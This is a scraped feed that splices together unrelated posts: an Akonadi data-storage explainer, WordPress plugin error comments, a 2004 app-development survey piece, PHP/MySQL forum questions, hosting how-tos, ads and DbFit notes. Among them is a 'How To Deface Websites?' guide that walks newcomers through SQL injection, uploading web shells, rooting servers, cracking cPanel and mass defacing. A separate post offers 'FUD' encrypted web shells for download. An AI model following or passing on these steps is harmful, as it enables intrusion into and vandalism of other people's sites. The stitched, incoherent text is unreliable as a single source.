Akonadi misconception #1: where is my data?        

KDE Project:

I regularly see the same misconception and fear popping up on the mailing lists, bug reports and IRC: if the Akonadi database gets corrupted, I will lose my data.

To make it clear from the beginning: the Akonadi database is NOT your MAIN data storage.
Even if it gets destroyed, removed, your data is still safe.

So what is the database?

1) It is an interface: the Akonadi server and the underlying database is a common interface to your (PIM-alike) data for different applications, so those applications do not have to deal with the data files directly.

2) But I see my email headers and even the body in the database and in $HOME/.local/share/akonadi/file_db_data. Why? Because the database is also a cache towards your data. Common, frequently accessed parts (like e-mail headers) are stored in the database. These are usually stored permanently and kept in sync with your original data source (IMAP folders, mails on the local disc).
Parts requested infrequently are either stored in the database or in the above folder. The actual place is decided upon the size of the data. These parts are from time to time cleaned up from the cache, if they were not used for a certain period of time. Technically it is possible to configure when the cache is cleaned or if it is cleaned at all, but the regular user should not have to deal with it.

3) Is there anything I might lose by deleting the database? Yes, there is, and that is the metadata added to your data. That can be anything extra information that cannot be stored in the format of your data, like Nepomuk tags or other custom information. In case of emails, you might think that read/forwarded/etc. can be lost. Luckily this is not the case (since KDE 4.7.2), as the email storage formats can store these informations natively.

The above explains why you will not lose any critical information by losing your akonadi database.

Good, but where is my data if not in the database? This depends on what kind of data we are talking about.

1) E-mail: in case of IMAP (online or disconnected) your data is on the IMAP server. With disconnected IMAP there are windows when your local cache contains data that is not yet syncronized to the server, deleting the local cache in this case indeed will make you lose the unsynchronized files. This is not Akonadi specific though, this is true for any disconnected IMAP client.
In case of POP3, the mails is stored immediately after download in a local maildir folder. The actual place of the folder depends on your configuration, it can be just as $HOME/Mail, as $HOME/kde./share/apps/kmail/ or $HOME/.local/share/.local-mail (for new installations).

2) Calendars and contact information: they can be either on a server (Kolab server, LDAP server) and only cached in Akonadi as explained, or they can be in local vcard or .ics file. The actual location of these files again depends on your setup. The new standard place for them is $HOME/.local/share/contacts.

Still there were reports of data losing, why? Unfortunately programmers are not perfect and introduce bugs in the codebase. One of the most severe bugs caused real data losing when copying mails from one folder to another. This is fixed with KDE 4.7.2+ and any recent Akonadi server. There are other bugs around, but none will cause losing your original data files.

Finally, what will happen if the database gets corrupted? Of course, it needs to be recreated. You can try by shutting down akonadi server (akonadictl stop), removing the $HOME/.local/share/akonadi and syncronize all your resources again (this will take some time). If the database is not recreated, you need to do a full cleanup by removing also the configuration files under $HOME/.config/akonadi.
Then you need to add back your resources (IMAP/POP3/contact files/etc) and syncrhonize them. In case of emails, you need to check your filters, they most probably try to move the mails into a wrong folder.
Yes, this is a lot of work and should be avoided as much as possible, but it should be done only in the rare case of real database corruption.

I hope this will clear some confusion about the data storage inside Akonadi.

And a few word about the database itself.
We use MySql. I don't know the original reason why it was picked up (ask Volker about that ;) ), but I know some people don't like it for whatever reason.
Most of them try to use SqLite. A friendly warning: don't. This is explained also in the akonadi wiki. All what is written there is true, and I experienced myself as well.
Unfortunately recently I learned that MySQL has some severe issues in certain cases: NFS mounted home directories and failed suspend/resume. In these cases the database gets corrupted (this is a MySQL bug!), and cannot be easily restored. I did not experience this corruption myself, but was reported from time to time.
What remains is trying another database server, namely PostgreSQL. Akonadi supports it, it is possible to change the database backend in the akonaditray or in the akonadiconsole application. Changing backends means importing all your data again to the database, like you'd start from scratch. PostgreSQL support is not that well tested, so expect some rough edges, but we would like to see people try it out and reporting their experience with it.
It is my personal opinion only, but if PostgreSQL proves to work fine, we might switch to that as the default backend, given the problems with MySQL.

What about other database backends? There were plans to use Virtuoso, to reduce the number of database severs needed for a KDE desktop, but the work was not completed. See the techbase aritcle.

UPDATE: Christophe Giboudeaux raised a point about PostgreSQL, that their database format changes between major releases in an incompatible way and there is no automated, easy way for upgrade (you need to dump it with the old version and import with the new one). Sad, that there is no perfect solution.

          How To Deface Websites?        

Everyone who is new to hacking, the first thing that they want to learn is how to deface a website, root the server or how to crack cPanels of the website. In this post I will be telling you how hackers manage to break into a website- deface it, symlink it, root the server etc.

So let's start.

SQL Injection

SQL Injection is one of the most widely and commonly used method for hacking and breaking into the website. For performing SQL Injections attacks, manual approach as well as automated tool approach can be used. You can find SQL Vulnerable sites from here

For Automated SQL Injection
SQL Injection using Havij Automated Tool
SQL Injection through SQL Map
SQL Injection with you Android Phone

Download Havij Pro version from here

For Manual SQL Injection
Manual SQL Injection
MySQL Injection
Hack Admin Panel of a Website with SQL Injection

Hacking a Website on Shared Server.
Suppose you have a website which is hosted on the server with an IP address and you want to shell this server and have to access a particular site and deface it.
So to accomplish this task you can use bing, Learn it from here

Broke into the admin panel? confused now what to do?
Now, you are finally into the administrator panel of the website. Now you next task is to upload a shell. So for that find a upload forum, and shell it with Live HTTP headers, learn this from here.
Sometimes server security is tight so it is difficult to get you shell executed. If you face any similar kind of problem, here is the solution.

To upload you shell on Joomla refer to the post -> How to Upload You Shell on Joomla
for Wordpress go here -> Upload You Shell on Wordpress

Learn hacking wordpress and joomla sites from here

You got your shell up on the server. Now you can simply deface it. Root the server, mass deface it. symlink it.

How to root a server
How to crack cPanel
How to mass deface
Mass defacing script
How to Symlink

Got doubts? Comment below and get you query solved.

           New And Latest FUD Encrypted Shells Collection 2013        

 New And Latest FUD Encrypted Shells Collection

Interface Of Shells 


Download Link :- Link 1 

          Kommentar zu Docs & Demo von b.a.        
The plugin never use this function. Try a google search to "Fatal error: Uncaught Error: Call to undefined function mysql_get_server_info()" maybe someone had the same problems.
          Kommentar zu Docs & Demo von Thomas        
Even if I deactivate all pluins the same alert still remain. Here´s the complete alert (I´ve just replaced account and domain infos with "...": "Fatal error: Uncaught Error: Call to undefined function mysql_get_server_info() in /www/htdocs/...../wp-content/plugins/google-maps-gpx-viewer/php/gpx_database.php:191 Stack trace: #0 /www/htdocs/...../wp-content/plugins/google-maps-gpx-viewer/php/gpx_database.php(12): poi_db_install() #1 /www/htdocs/...../wp-content/plugins/google-maps-gpx-viewer/php/map_functions.php(17): require_once('/www/htdocs/w01...') #2 /www/htdocs/..../plugins/google-maps-gpx-viewer/google-maps-gpx-viewer.php(17): require('/www/htdocs/w01...') #3 /www/htdocs/....../includes/plugin.php(1882): include('/www/htdocs/w01...') #4 /www/htdocs/..../wp-admin/plugins.php(164): plugin_sandbox_scrape('google-maps-gpx...') #5 {main} thrown in /www/htdocs/....../wp-content/plugins/google-maps-gpx-viewer/php/gpx_database.php on line 191"
          Kommentar zu Docs & Demo von Thomas        
Hi, your plugin looks really great and if it would work I would also donate usage. Unfortunately I´ve a fatal error when if I try to activitate the plugin: "Fatal error: Uncaught Error: Call to undefined function mysql_get_server_info() " Wordpress verion: 4.7.3 PHP-VErsion: 5.6.29 MySQL-VErsion: 5.7.15 Do you know any solution?
          Kommentar zu Docs & Demo von b.a.        
In gpx_database.php search for: mysql_get_client_info and replace with: mysqli_get_client_info Save the change and then retry.
          Kommentar zu Docs & Demo von Jo Swan        
Hi, I've downloaded the plugin but upon activation (activate plugin) i get the following error: Fatal error: Call to undefined function mysql_get_server_info() in D:\xampp\htdocs\Green\wp-content\plugins\google-maps-gpx-viewer\php\gpx_database.php on line 191 Can this be resolved? What am I to do next? Any suggestions? Wordpress is up to date... (WordPress 4.5.3) Thanks,
          Migration (almost) complete        

This weekend has seen a complete migration of An Architect's View from a very old version of BlogCFC (3.5.2) with a custom Fusebox 4.1 skin to the latest Mango Blog (1.4.3) as well as a complete migration of all of the content of the non-blog portion of corfield.org (my personal stuff, my C++ stuff and a bunch of stuff about CFML, Fusebox and Mach-II) from Fusebox to FW/1. I've moved from a VPS on HostMySite to an "enterprise cloud server" at EdgeWebHosting and I think it's all gone pretty smoothly although it's been a lot of work.

Hopefully I haven't broken too many URLs - I spent quite a bit of time working on Apache RewriteRules to try to make sure old URLs still work - but it has given me the opportunity to streamline a lot of the files on the site (can you imagine how much cruft can build up in eight years of running a site?).

What's left? Just the "recommended reading" bookstore portion of my old site. I store the book details in an XML file and process them in a CFC as part of the old Fusebox app (converted from Mach-II before that and from PHP before that). It's late and I can't face it tonight. Then I need to build out a Mango skin that looks like my old site (and eventually re-skin the non-blog portion of the site).

The underpinnings of the site are Apache, Railo ( at the time of writing), Tomcat (6.0.26 at the time of writing), Red Hat Linux, MySQL. I still have some fine-tuning to do but this is pretty much an out-of-the-box WAR-based install of Railo on Tomcat for this one site on the server. Over time I'll probably build out a home for FW/1 here under another domain, with examples and more documentation than is currently maintained on the RIAForge wiki. That's the plan anyway.

If you find any broken links, let me know (the Contact Me! link is in the right hand column, near the bottom).

          MySQL 死锁与日志二三事        

最近线上 MySQL 接连发生了几起数据异常,都是在凌晨爆发,由于业务场景属于典型的数据仓库型应用,白天压力较小无法复现。甚至有些异常还比较诡异,最后 root cause 分析颇费周折。那实际业务当中咱们如何能快速的定位线上 MySQL 问题,修复异常呢?下文我会根据两个实际 case,分享下相关的经验与方法。

MySQL 死锁与日志二三事,首发于文章 - 伯乐在线。

          MySQL 高性能表设计规范        

良好的逻辑设计和物理设计是高性能的基石, 应该根据系统将要执行的查询语句来设计schema, 这往往需要权衡各种因素。

MySQL 高性能表设计规范,首发于文章 - 伯乐在线。

          Comment on Ruby, NewRelicRPM, Font-face, Redis, testing, etc. by andre        
I recommend free MySQL-manager - Valentina Studio, check it out if you haven’t tried it yet: http://www.valentina-db.com/valentina-studio-overvie
          [news] "2004 State of Application Development"        
Friday, August 13, 2004
Dateline: China
Special issues of journals and magazines are often quite good -- if you're into the subject matter.  But the current issue of VARBusiness is absolutely SUPERB!!  EVERY SYSTEMS INTEGRATOR SHOULD READ IT ASAP -- STOP WHAT YOU'RE DOING AND READ THIS ISSUE!!  (Or, at the very least, read the excerpts which follow.)  See http://tinyurl.com/6smzu .  They even have the survey results to 36 questions ranging from change in project scope to preferred verticals.  In this posting, I'm going to comment on excerpts from this issue.  My comments are in blue.  Bolded excerpted items are MY emphasis.
The lead article and cover story is titled, "The App-Dev Revolution."  "Of the solution providers we surveyed, 72 percent say they currently develop custom applications or tailor packaged software for their customers. Nearly half (45 percent) of their 2003 revenues came from these app-dev projects, and nearly two-thirds of them expect the app-dev portion of total revenue to increase during the next 12 months."  I view this as good news for China's SIs; from what I've observed, many SIs in China would be a good fit for SIs in the U.S. looking for partners to help lower their development costs.  "By necessity, today's solution providers are becoming nimbler in the software work they do, designing and developing targeted projects like those that solve regulatory compliance demands, such as HIPAA, or crafting wireless applications that let doctors and nurses stay connected while they roam hospital halls."  Have a niche; don't try to be everything to everyone.  "Nine in 10 of survey respondents said their average app-dev projects are completed in less than a year now, with the smallest companies (those with less than $1 million in revenue) finishing up in the quickest time, three months, on average."  Need for speed.  "The need to get the job done faster for quick ROI might explain the growing popularity of Microsoft's .Net framework and tools.  In our survey, 53 percent of VARs said they had developed a .Net application in the past 12 months, and 66 percent of them expect to do so in the coming 12 months."  My Microsoft build-to-their-stack strategy.  "Some of the hottest project areas they report this year include application integration, which 69 percent of VARs with between $10 million or more in revenue pinned as their busiest area.  Other top development projects center around e-commerce applications, CRM, business-intelligence solutions, enterprisewide portals and ERP, ..."  How many times have I said this?    "At the same time, VARs in significant numbers are tapping open-source tools and exploiting Web services and XML to help cut down on expensive software-integration work; in effect, acknowledging that application development needs to be more cost-conscious and, thus, take advantage of open standards and reusable components.  Our survey found that 32 percent of VARs had developed applications on Linux in the past six months, while 46 percent of them said they plan to do so in the next six months.  The other open-source technologies they are using today run the gamut from databases and development tools to application servers."  I guess there's really an open source strategy.  I come down hard on open source for one simple reason:  I believe that SIs in China could get more sub-contracting business from a build-to-a-stack strategy.  And building to the open source stack isn't building to a stack at all!!  "As a business, it has many points of entry and areas of specialization.  Our survey participants first arrived in the world of app dev in a variety of ways, from bidding on app-dev projects (45 percent) to partnering with more experienced developers and VARs (28 percent) to hiring more development personnel (31 percent)."  For SIs in China, simply responding to end-user RFQs is kind of silly.  Better to partner on a sub-contracting basis.  "According to our State of Application Development survey, health care (36 percent), retail (31 percent) and manufacturing (30 percent) ranked as the most popular vertical industries for which respondents are building custom applications.  Broken down further, among VARs with less than $1 million in total sales, retail scored highest, while health care topped the list of midrange to large solution providers."  Because of regulatory issues, I'm not so keen on health care.  I'd go with manufacturing followed by retail.  My $ .02.  "When it comes to partnering with the major platform vendors, Microsoft comes out the hands-on winner among ISVs and other development shops.  A whopping 76 percent of developers in our survey favored the Microsoft camp.  Their level of devotion was evenly divided among small, midsize and large VARs who partner with Microsoft to develop and deliver their application solutions.  By contrast, the next closest vendor is IBM, with whom one in four VARs said they partner.  Perhaps unsurprisingly, the IBM percentages were higher among the large VAR category (those with sales of $10 million or more), with 42 percent of their partners coming from that corporate demographic.  Only 16 percent of smaller VARs partner with IBM, according to the survey.  The same goes for Oracle: One-quarter of survey respondents reported partnering with the Redwood Shores, Calif.-based company, with 47 percent of them falling in the large VAR category.  On the deployment side, half of the developers surveyed picked Windows Server 2003/.Net as the primary platform to deliver their applications, while IBM's WebSphere application server was the choice for 7 percent of respondents.  BEA's WebLogic grabbed 4 percent, and Oracle's 9i application server 3 percent of those VARs who said they use these app servers as their primary deployment vehicle."  Microsoft, Microsoft, Microsoft.  Need I say more?  See http://tinyurl.com/45z94 .
The next article is on open source.  "Want a world-class database with all the bells and whistles for a fraction of what IBM or Oracle want?  There's MySQL.  How about a compelling alternative to WebSphere or WebLogic?  Think JBoss.  These are, obviously, the best-known examples of the second generation of open-source software companies following in the footsteps of Apache, Linux and other software initiatives, but there are far more alternatives than these.  Consider Zope, a content-management system downloaded tens of thousands of times per month free of charge, according to Zope CEO Rob Page.  Some believe Zope and applications built with Zope are better than the commercial alternative they threaten to put out of business, Documentum.  Zope is also often used to help build additional open-source applications.  One such example is Plone, an open-source information-management system.  What began as a fledgling movement at the end of the past decade and later became known as building around the "LAMP stack" (LAMP is an acronym that stands for Linux, Apache, MySQL and PHP or Perl) has exploded to virtually all categories of software.  That includes security, where SpamAssassin is battling spam and Symantec, too.  Popular?  Well, it has now become an Apache Software Foundation official project.  The use of open source is so widespread that the percentage of solution providers who say they partner with MySQL nearly equals the percentage who say they partner with Oracle"23 percent to 25 percent, respectively.There are plenty of choices for those SIs willing to play the open source game.  See http://tinyurl.com/4e3c7 .
"It's all about integration" follows.  "There are many reasons for the surge in application-development projects (the recent slowdown in software spending notwithstanding).  For one, many projects that were put on hold when the downturn hit a few years ago are now back in play.  That includes enterprise-portal projects, supply-chain automation efforts, various e-commerce endeavors and the integration of disparate business systems."  Choose carefully, however.  Balance this data with other data.  Right now, I see a lot more play with portals and EAI.  "Indeed, the need for quality and timely information is a key driver of investments in application-integration initiatives and the implementation of database and business-intelligence software and portals.  A healthy majority of solution providers say application integration is a key component of the IT solutions they are deploying for customers.  According to our application-development survey, 60 percent say their projects involved integrating disparate applications and systems during the past 12 months."  "Some customers are moving beyond enterprise-application integration to more standards-based services-oriented architectures (SOAs).  SOAs are a key building block that CIOs are looking to build across their enterprises."  Anyone who regularly reads any one of my three IT-related blogs knows that I'm gung-ho on SOAs.  "Even if your customers are not looking for an SOA, integrating different systems is clearly the order of the day.  To wit, even those partners that say enterprise portals or e-business applications account for the bulk of their business note that the integration component is key."  Yes, integration, integration, integration.  I'll be saying this next year, too.  And the year after ...  "Another way to stay on top of the competition is to participate in beta programs."  Absolutely true -- and a good strategy, too.  See http://tinyurl.com/6x2gg .
The next article is on utility computing versus packaged softwareAgain, if you read what I write, you know that I'm also gung-ho on utility computing.  "According to VARBusiness' survey of application developers, more than 66 percent of the applications created currently reside with the customer, while 22 percent of applications deployed are hosted by the VAR.  And a little more than 12 percent of applications developed are being hosted by a third party.   Where services have made their biggest inroads as an alternative to software is in applications that help companies manage their customer and sales information.The article goes on to state that apps that are not mission-critical have the best chance in the utility computing space.  Time will tell.  Take note, however, that these are often the apps that will most likely be outsourced to partners in China.  "Simply creating services from scratch and then shopping them around isn't the only way to break into this area.  NewView Consulting is expanding its services business by starting with the client and working backward.  The Porter, Ind.-based security consultant takes whatever technology clients have and develops services for them based on need."   And focus on services businesses and .NET, too.  "Most application developers agree that services revenue will continue to climb for the next year or two before they plateau, resulting in a 50-50 or 60-40 services-to-software mix for the typical developer.  The reason for this is that while applications such as CRM are ideally suited to services-based delivery, there are still plenty of other applications that companies would prefer to keep in-house and that are often dependent on the whims of a particular company."  Still, such a split shows a phenomenal rise in the importance of utility computing offerings.  See http://tinyurl.com/54blv .
Next up:  Microsoft wants you!!  (Replace the image of Uncle Sam with the image of Bill Gates!!)  Actually, the article isn't specifically about Microsoft.  "Microsoft is rounding up as many partners as it can and is bolstering them with support to increase software sales.  The attitude is: Here's our platform; go write and prosper.  IBM's strategy, meanwhile, is strikingly different.  While it, too, has created relationships with tens of thousands of ISVs over recent years,  IBM prefers to handpick a relatively select group, numbering approximately 1,000, and develop a hand-holding sales and marketing approach with them in a follow-through, go-to-market strategy."  Both are viable strategies, but NOT both at the same time!!  "To be sure, the results of VARBusiness' 2004 State of Application Development survey indicates that Microsoft's strategy makes it the No. 1 go-to platform vendor among the 472 application developers participating in the survey.  In fact, more than seven out of 10 (76 percent) said they were partnering with Microsoft to deliver custom applications for their clients.  That number is nearly three times the percentage of application developers (26 percent) who said they were working with IBM ..."  Percentages as follows:  Microsoft, 76%; IBM, 26%; Oracle, 25%; MySQL, 23%; Red Hat, 17%; Sun, 16%; Novell, 11%; BEA, 9%.  I said BOTH, NOT ALL.  Think Microsoft and IBM.  However, a Java strategy could be BOTH a Sun AND IBM strategy (and even a BEA strategy).  See http://tinyurl.com/68grf .
There was another article I liked called, "How to Team With A Vendor," although it's not part of the app-dev special section per se.  This posting is too long, so I'll either save it for later or now note that it has been urled.  See http://www.furl.net/item.jsp?id=680282 .  Also a kind of funny article on turning an Xbox into a Linux PC.  See http://tinyurl.com/4mhn6 .  See also http://www.xbox-linux.org .
Quick note:  I'll be in SH and HZ most of next week, so I may not publish again until the week of the 23rd.
David Scott Lewis
President & Principal Analyst
IT E-Strategies, Inc.
Menlo Park, CA & Qingdao, China
http://www.itestrategies.com (current blog postings optimized for MSIE6.x)
http://tinyurl.com/2r3pa (access to blog content archives in China)
http://tinyurl.com/2azkh (current blog postings for viewing in other browsers and for access to blog content archives in the US & ROW)
http://tinyurl.com/2hg2e (AvantGo channel)
To automatically subscribe click on http://tinyurl.com/388yf .

          ÐšÐ°Ðº создать базу данных, добавить сайт и дополнительный домен (alias) на хостинге        

Здравствуйте, уважаемые читатели блога Goldbusinessnet.com! Сегодня подробно остановимся на таких действиях в админ панели хостинга (что это такое?) как создание базы данных, добавление нового сайта и дополнительных доменов (алиасов).

Это самые распространенные и часто осуществляемые пользователями операции. Как всегда, практика позволяет получить необходимые навыки и в дальнейшем подобные мероприятия будут производится вами на полном автомате, легко и непринужденно.

Хочу отметить, что все возможные действия, связанные с панелью управления хостингом, я рассматривал и буду дальше это делать на примере своего провайдера Спринтхост, поскольку уже на протяжении довольно длительного времени пользуюсь его услугами и хорошо знаю все тонкости (как купить хостинг для сайта на Sprinthost.ru).


          Retrieving Data From a MySQL Database        
In this article I am going to show you how to programmatically retrieve data from a MySQL database using the MySqlDataAdapter and the MySqlDataReader classes. Both these classes are available once you install the MySQL Connector for .NET which can be downloaded from here: MySQL Connectors. For this example we need a database with some […]
          Connecting to a MySQL Database Programmatically        
Microsoft Visual Studio lets you create a database connection using its IDE, and it’s quite powerful as well, but personally I prefer to create my database connections programmatically. When creating my connection’s code manually I find it easier to follow the code, plus it can be easier to debug as well. I am by no […]
          Partial Telecommute Automation Subject Matter Expert in the Walnut Creek Area        
A staffing and recruitment firm needs applicants for an opening for a Partial Telecommute Automation Subject Matter Expert in the Walnut Creek Area. Candidates will be responsible for the following: Driving Enterprise Change Management and Configuration Management process improvement projects Applying deep expertise in delivering process automation and ServiceNow Programming automation of report and scorecard creation via integration of reporting tools, Remedy and ServiceNow Skills and Requirements Include: Partial telecommute; must work some of the time at offices in Walnut Creek or Corona, CA Bachelor's Degree in CIS, Business Administration, or related field, or equivalent experience Minimum ten (10) years IT experience within a large matrixed organization Software Developer experience in: HTML, HTML5, CSS, CSS3, PHP, MySql, Ruby, etc Deep working knowledge of automation and reporting tools such as HPOO, IBM Rational, BluePrism, Tableau and others All other requirements listed by the company
          WEB应用中的身份验证(1)--基本身份验证BASIC authorization method         

在任何一种WEB应用开发中,不论大中小规模的,每个开发者都会遇到一些需要保护程序数据的问题,涉及到用户的LOGIN ID和PASSWORD。那么如何执行验证方式更好呢?实际上,有很多方式来实现。在本文里,我们不会把所有的验证方法都考虑到,我们的目的是让你学会如何以最简单最方便的验证方法来完成。下面将讨论基本验证方式之一(BASIC authorization method)


            CREATE TABLE users (
                  id int(11) NOT NULL auto_increment,
                    username varchar(20) NOT NULL,
                    password varchar(20) NOT NULL,
                    PRIMARY KEY  (id)

           CREATE TABLE roles(
                    id int(11) NOT NULL auto_increment,
                    rolename varchar(20) NOT NULL,
                    PRIMARY KEY  (id)
       CREATE TABLE user_roles (
          id int(11) NOT NULL auto_increment,
          username varchar(20) NOT NULL,
          rolename varchar(20) NOT NULL,
          PRIMARY KEY  (id)
       insert into users(username,password) values('zhangdongyu', 'loveyuanyuan')
       insert into roles(rolename) values('manager')
       insert into user_roles(username,rolename) values('zhangdongyu', 'manager')
      <Realm className="org.apache.catalina.realm.MemoryRealm" />
      connectionURL="jdbc:mysql://localhost/weblogin" <!--数据库连接地址-->
      connectionName="root"              <!--数据库用户名-->
           connectionPassword="123"            <!--数据库密码-->
          userTable="users"                <!--用户表-->
           userNameCol="username"              <!--用户名列-->
           userCredCol="password"             <!--密码列-->  
           userRoleTable="user_roles"            <!--用户权限对应表-->
           roleNameCol="rolename"              <!--权限列-->



       <web-resource-name>Web Demo</web-resource-name>
      <realm-name>Web Demo</realm-name>


  ä¼šå¼¹å‡ºéªŒè¯å¯¹è¯æ¡†ï¼Œè®©ä½ è¾“入用户名和密码,只有输入库中的用户名密码并且该用户有manager权限时才能进


疯狂 2011-03-22 18:33 发表评论

WordPress専用のレンタルサーバーwpX wpXクラウド全プランとwpXレンタルサーバーがMYSQL容量増加が発表された。 これは非常に嬉しい限り。 従来のスペックだと結構myaqlに対して割高になる感じがしていた・・・
          Anket Scripti        
Birkaç ay önce bir anket yapmam gerekiyordu. Biraz da boş vaktim vardı, ben de oturup kendi anket scriptimi yazayım dedim. Burada paylaşmaya yeni fırsat buluyorum. PHP ve MySQL veritabanı kullanarak yazdığımı belirtmekte fayda var. Scriptten kısaca bahsedeyim. Aynı anda birden...
Read more

• Pengertian PHP

• Hubungan PHP dengan HTML

• Kelebihan PHP

Pengertian PHP
PHP adalah singkatan dari "PHP: Hypertext Preprocessor", yang merupakan
sebuah bahasa scripting yang terpasang pada HTML. Sebagian besar sintaks mirip
dengan bahasa C, Java dan Perl, ditambah beberapa fungsi PHP yang spesifik.
Tujuan utama penggunaan bahasa ini adalah untuk memungkinkan perancang web
menulis halaman web dinamik dengan cepat.
Hubungan PHP dengan HTML
Halaman web biasanya disusun dari kode-kode html yang disimpan dalam
sebuah file berekstensi .html. File html ini dikirimkan oleh server (atau file) ke
browser, kemudian browser menerjemahkan kode-kode tersebut sehingga
menghasilkan suatu tampilan yang indah. Lain halnya dengan program php, program
ini harus diterjemahkan oleh web-server sehingga menghasilkan kode html yang
dikirim ke browser agar dapat ditampilkan. Program ini dapat berdiri sendiri ataupun
disisipkan di antara kode-kode html sehingga dapat langsung ditampilkan bersama
dengan kode-kode html tersebut. Program php dapat ditambahkan dengan mengapit
program tersebut di antara tanda . Tanda-tanda tersebut biasanya disebut
tanda untuk escaping (kabur) dari kode html. File html yang telah dibubuhi program
php harus diganti ekstensi-nya menjadi .php3 atau .php.
PHP merupakan bahasa pemograman web yang bersifat server-side
HTML=embedded scripting, di mana script-nya menyatu dengan HTML dan berada
si server. Artinya adalah sintaks dan perintah-perintah yang kita berikan akan
sepenuhnya dijalankan di server tetapi disertakan HTML biasa. PHP dikenal sebgai
bahasa scripting yang menyatu dengan tag HTML, dieksekusi di server dan
digunakan untuk membuat halaman web yang dinamis seperti ASP (Active Server
Pages) dan JSP (Java Server Pages).
PHP pertama kali dibuat oleh Rasmus Lerdroft, seorang programmer C.
Semula PHP digunakannya untuk menghitung jumlah pengunjung di dalam webnya.
Kemudian ia mengeluarkan Personal Home Page Tools versi 1.0 secara gratis. Versi
ini pertama kali keluar pada tahun 1995. Isinya adalah sekumpulan script PERL yang
dibuatnya untuk membuat halaman webnya menjadi dinamis. Kemudian pada tahun
1996 ia mengeluarkan PHP versi 2.0 yang kemampuannya telah dapat mengakses
database dan dapat terintegrasi dengan HTML.
Pada tahun 1998 tepatnya pada tanggal 6 Juni 1998 keluarlah PHP versi 3.0
yang dikeluarkan oleh Rasmus sendiri bersama kelompok pengembang softwarenya..
Versi terbaru, yaitu PHP 4.0 keluar pada tanggal 22 Mei 2000 merupakan
versi yang lebih lengkap lagi dibandingkan dengan versi sebelumnya. Perubahan
yang paling mendasar pada PHP 4.0 adalah terintegrasinya Zend Engine yang dibuat
oleh Zend Suraski dan Andi Gutmans yang merupakan penyempurnaan dari PHP
scripting engine. Yang lainnya adalah build in HTTP session, tidak lagi menggunakan
library tambahan seperti pada PHP. Tujuan dari bahasa scripting ini adalah untuk
membuat aplikasi-aplikasi yang dijalankan di atas teknologi web. Dalam hal ini,
aplikasi pada umumnya akan memberikan hasil pada web browser, tetapi prosesnya
secara keseluruhan dijalankan web server.
Kelebihan PHP
Ketika e-commerce semakin berkembang, situs-situs yang statispun semakin
ditinggalkan, karena dianggap sudah tidak memenuhi keinginan pasar, padahal situs
tersebut harus tetap dinamis. Pada saat ini bahasa PERL dan CGI sudah jauh
ketinggalan jaman sehingga sebagian besar designer web banyak beralih ke bahasa
server-side scripting yang lebih dinamis seperti PHP.
Seluruh aplikasi berbasis web dapat dibuat dengan PHP. Namun kekuatan
yang paling utama PHP adalah pada konektivitasnya dengan system database di
dalam web. Sistem database yang dapat didukung oleh PHP adalah :

1. Oracle
2. MySQL
3. Sybase
4. PostgreSQL
5. dan lainnya

PHP dapat berjalan di berbagai system operasi seperti windows 98/NT,
UNIX/LINUX, solaris maupun macintosh.
          Consultoría empresarial en tic's        
Desarrollo y administración de proyectos en tecnología con 15 años de experiencia en diversas áreas de especialización; sistemas de gestión, métodos, procedimientos e innovación conforme a estándares iso 9001, iso 27001, iso 20000, pmi, bs 259999, itil, cmmi, scrum, cobit, maagtic-si, tsp-psp. Proyectos de telecomunicaciones en enlaces lan, wan, administración de servidores; unix, microsoft, oracle, weblogic, sql, mysql, etc. Desarrollo de software; api's web y móbil (android, ios), administración de data center's y servicios de consultoría en tic's. ¡pregúntanos cómo, te asesoramos!
          Cursos de verano a domicilio puebla        
Cursos de verano a domicilio puebla. ofrezco cursos de verano a domicilio de word, excel, power point , html php mysql dremawaver para los tres niveles básico, intermedio, avanzado, asi como curso de reparación y enzamblado de computadoras… contáctateme
          CloudSQL for the busy Java Developer        
CloudSQL, Google’s fully-managed and highly-available MySQL-based relational database service, can be accessed directly by Java IDE’s or used as a target for on-premise running Java application servers, and of course it can be seamlessly used from AppEngine Java applications. Here’s how. Pre-requisites This paper assumes you have a CloudSQL database instance configured and (ideally) populated. You … Continue reading "CloudSQL for the busy Java Developer"
          djunjich написал(а) в теме: вывод данных из БД mysql php        
          Kusss написал(а) в теме: вывод данных из БД mysql php        
          djunjich написал(а) в теме: вывод данных из БД mysql php        
Помогите пожалуйста, как можно вывести данные из mysql в виде таблицы, в которой ячейки будут в виде Input, чтобы тут же можно их было отредактировать и сохранить, т.е как в таблице excel
Вот мой код:

$link = mysqli_connect('localhost', "djunjich", '011168', 'dbip');
if ( !$link ) die("Error");
mysqli_query($link, "SET NAMES utf8");

$query = "select * from goroh";
$result = mysqli_query($link, $query);
if ( !$result ) echo "Произошла ошибка: ".mysqli_error();
//else echo "Данные получены";

print '<table border="5" align="center" bgcolor="EEE8AA">';
//print '<table>'
//<link rel="stylesheet" href="css/style.css">

while($row = $result->fetch_object()) {
print '<tr>';
print '<td>'.$row->IP.'</td>';
print '<td>'.$row->Hostname.'</td>';
print '<td>'.$row->Location.'</td>';
print '<td>'.$row->MAC_Address.'</td>';
print '<td>'.$row->Notes.'</td>';
print '</tr>';
print '</table>';
// Frees the memory associated with a result


          Siberian.pro написал(а) в теме: PHP-разработчик.        
Информация об оплате: 60 000-80 000

В команду Siberian.pro требуется PHP-разработчик уровня Middle/Senior.
Мы помогаем стартапам со всего мира реализовывать их идеи.
Да, мы занимаемся аутсорсом, но только тех проектов, которые нам нравится делать.

Мы ищем человека, который:
  • Не боится браться за решение новых, нестандартных задач;
  • Умеет хорошо обращаться с PHP (Yii2|Symfony|Laravel), JavaScript (Client/Server), HTML, CSS, MySQL|PostgreSQL, Nginx, Git;
  • Знает или хочет разобраться, как работают высоконагруженные проекты;
  • Знает, что такое и, может быть даже, использовал Redis, RabbitMQ, Sphinx;
  • С возможностью 2-3 раза в неделю приезжать в офис ((очень желательно, но не критично).

Мы предлагаем:
  • Сложную интересную работу;
  • Возможность работать удаленно из любой точки мира с удобным для вас графиком;
  • Обучение в рамках Академпарка (посещение IT конференций и мероприятий);
  • Изучать и применять новые технологии на практике и обмениваться знаниями и опытом;
  • Веселый и дружелюбный офис в Академпарке (Новосибирск).
Если вакансия интересна - жду резюме: job@siberian.pro



DbFit: Test-driven database development


Supports all major DBs Out-of-the-box support for Oracle, SQL Server, MySQL, DB2, PostgreSQL, HSQLDB and Derby.


Getting Started

  1. JREのインストール
  2. DbFitのダウンロード
  3. 適当なフォルダでzipを展開する


  1. startFitnesse.batを実行すると、コマンドプロンプトが立ち上がりDbFitが実行されます。
  2. http://localhost:8085/ にアクセスすると、DbFitのフロントページが表示されます。 f:id:JHashimoto:20161121170130p:plain


